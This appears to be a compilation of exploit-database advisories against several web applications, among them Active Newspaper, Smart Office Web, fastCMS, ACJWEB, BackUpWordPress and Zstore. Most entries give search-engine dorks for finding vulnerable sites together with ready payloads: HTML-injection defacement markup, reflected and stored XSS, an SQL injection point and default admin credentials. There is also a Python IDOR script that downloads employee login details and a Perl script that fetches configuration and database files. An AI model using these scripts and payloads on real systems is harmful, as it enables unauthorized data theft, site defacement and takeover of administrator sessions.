<pre><code>====================================================================================================================================<br />| # Title : Active Newspaper v2.0 HTML inject Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : https://activeitzone.com/demo/newspaper_v2.0/ | <br />| # Dork : n/a |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Register new member .<br /><br />[+] go to edit your profil https://127.0.0.1/activeitzonecom/demo/newspaper_v2.0/home/profile<br /><br />[+] edit your profil , put your code or use this code for test in First Name case or Last Name or ...etc :<br /><br /><marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /></tr><br /><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a><br /></tr><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | <br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)<br /># Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office"<br /># Date: 09/Dec/2022<br /># Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)<br /># Vendor Homepage: https://smartofficepayroll.com/<br /># Software Link: https://smartofficepayroll.com/downloads<br /># Version: Smart Office Web 20.28 and before<br /># CVE Number : CVE-2022-47075 and CVE-2022-47076<br /># CVSS : 7.5 (High)<br /># Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/<br /># Vulnerability Description:<br /># Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails.<br /><br />import wget<br />import os<br />from colorama import Fore, Style<br /><br />def download_file(url, filename):<br /> wget.download(url, filename)<br /><br /># Disclaimer<br />print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.")<br />print("The author takes no responsibility for any unauthorized usage.")<br />print("Please use this script responsibly and adhere to the legal and ethical guidelines.")<br /><br />agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ")<br />if agree != "1":<br /> print("You have chosen not to agree. Exiting the script.")<br /> exit()<br /><br /># Print name in red<br />name = "Exploit by Tejas Nitin Pingulkar"<br />print(Fore.RED + name)<br />print(Style.RESET_ALL) # Reset color<br /><br />website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ")<br />target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ")<br />folder_name = input("Enter the folder name to save the files: ")<br /><br /># Create the folder if it doesn't exist<br />if not os.path.exists(folder_name):<br /> os.makedirs(folder_name)<br /><br />urls_filenames = []<br /><br />if target_version == "1":<br /> urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"))<br />else:<br /> urls_filenames.extend([<br /> (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),<br /> (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"),<br /> (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"),<br /> (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv")<br /> ])<br /><br />print("CVE-2022-47076: Obtain user ID and password from downloaded source")<br /><br />for url, filename in urls_filenames:<br /> download_file(url, os.path.join(folder_name, filename))<br /><br /># Print "for more such interesting exploits, visit cvewalkthrough.com" in red<br />print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com")<br />print(Style.RESET_ALL) # Reset color<br /> <br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://fastcms.net/ │<br />│ Vendor : fastCMS │<br />│ Software : fastCMS Blogging 3.1.0 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />-----------------------------------------------<br />POST /demo/blog-post/599/how-to-choose-the-perfect-university-for-a-career-in-medicine/ HTTP/2<br /><br />name=cracker&email=[anything]&website=[anything]&comment=[XSS Payload]&submit=<br />-----------------------------------------------<br /><br />POST parameter 'comment' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. Visit any [Categorie] (as Guest)<br />2. Scroll Down to [Leave a Reply]<br />3. Inject your [XSS Payload] in "Comments Window"<br />4. Press [Post Comment]<br /><br />5. When the Admin Visit the [Comments] to Check [Pending Comments] on this Path (https://website/admin/modules/comments/comments.php?page=pending)<br />6. XSS will Fire & Executed on his Browser<br /><br />[-] Done<br /></code></pre>
<pre><code>======================================================================================|<br />| # Title : ACJWEB DESIGNER v 1.0 XSS Vulnerability |<br />| # Author : indoushka | <br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : aluizio81@gmail.com |<br />| # Drok : inurl:sobre.php?id= |<br />======================================================================================|<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : busca.php?pag=2'%22()%26%25<ScRiPt%20>prompt(947548)</ScRiPt><br /><br />[+] http://127.0.0.1/www/asmac.combr/busca.php?pag=2'%22()%26%25<ScRiPt%20>prompt(947548)</ScRiPt><br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress BackUpWordPress 3.8 Plugins Backup Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://wordpress.org/plugins/backupwordpress/ | <br />| # Dork : "/wp-content/backupwordpress- " |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] appears to leave backups in a world accessible directory under the document root.<br /><br />[+] Use Dork : "/wp-content/backupwordpress- "<br /><br />[+] The search result gives you some websites that took earlier a Wordpress backup.<br /><br />[+] http://127.0.0.1/WordPress3/wp-content/backupwordpress-89c0bd0079-backups/<br /><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Zstore version 6.5.4 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://github.com/leon-mbs/zstore/releases/tag/6.5.4 | <br />| # Dork : "Zippy склад" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download database backup :<br /><br /> This file may disclose sensitive information. This information can be used to launch further attacks.<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br /># Author : indoushka<br /><br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print "\n[+] Zstore version 6.5.4 Database Disclosure [+] \n\n";<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[+] Author : indoushka \n\n";<br />print "[-] How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/db.sql \n";<br />print "[+] usage2 : perl $0 localhost /db.sql \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="config/config.ini";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/db.sql");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/.env\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Ad Manager Pro 3.05 Backup Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit) | <br />| # Vendor : http://www.P30vel.ir | <br />| # Dork : |<br />====================================================================================================================================<br /><br />P0C :<br /><br />[+] appears to leave backups in a world accessible directory under the document root & The plugin exports a backup exported as a text file and contains sensitive informations.<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /admanager/data/<br /><br />[+] https://127.0.0.1/localhost/admanager/data/<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Active Matrimonial CMS v 1.4 HTML inject Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : https://activeitzone.com/ | <br />| # Dork : "Copyright © 2019 Active Matrimonial CMS - All Rights Reserved " |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Register new member .<br /><br />[+] Go to edit your profil http://127.0.0.1/xywarscom/home/profile<br /><br />[+] in Introduction box , put your code or use this code for test :<br /><br /><marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /></tr><br /><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a><br /></tr><br /><br />====Greetings to :===================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=====================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Acon - Architecture and Construction Website CMS v1.2 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.mother-of-mangrove.com/xicia/cc/acon/ | <br />| # Dork : Acon - Building and Architecture Website CMS |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /><br />[+] Dorking In Google Or Other Search Enggine .<br /><br />[+] use login : Username: admin@gmail.com & Password: 1234 <br /><br />[+] http://127.0.0.1/www/demoslycom/xicia/cc/acon/admin/<br /><br /> <br />====Greetings to :===================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=====================================================================================================================================<br /></code></pre>
<pre><code>======================================================================================|<br />| # Title : ACJWEB DESIGNER 1.0 - SQL Injection Vulnerability |<br />| # Author : indoushka | <br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : aluizio81@gmail.com |<br />| # Drok : inurl:sobre.php?id= |<br />======================================================================================|<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : http://127.0.0.1/asmac.combr/sobre.php?id= <======inject here<br /><br />[+] login = login.php<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>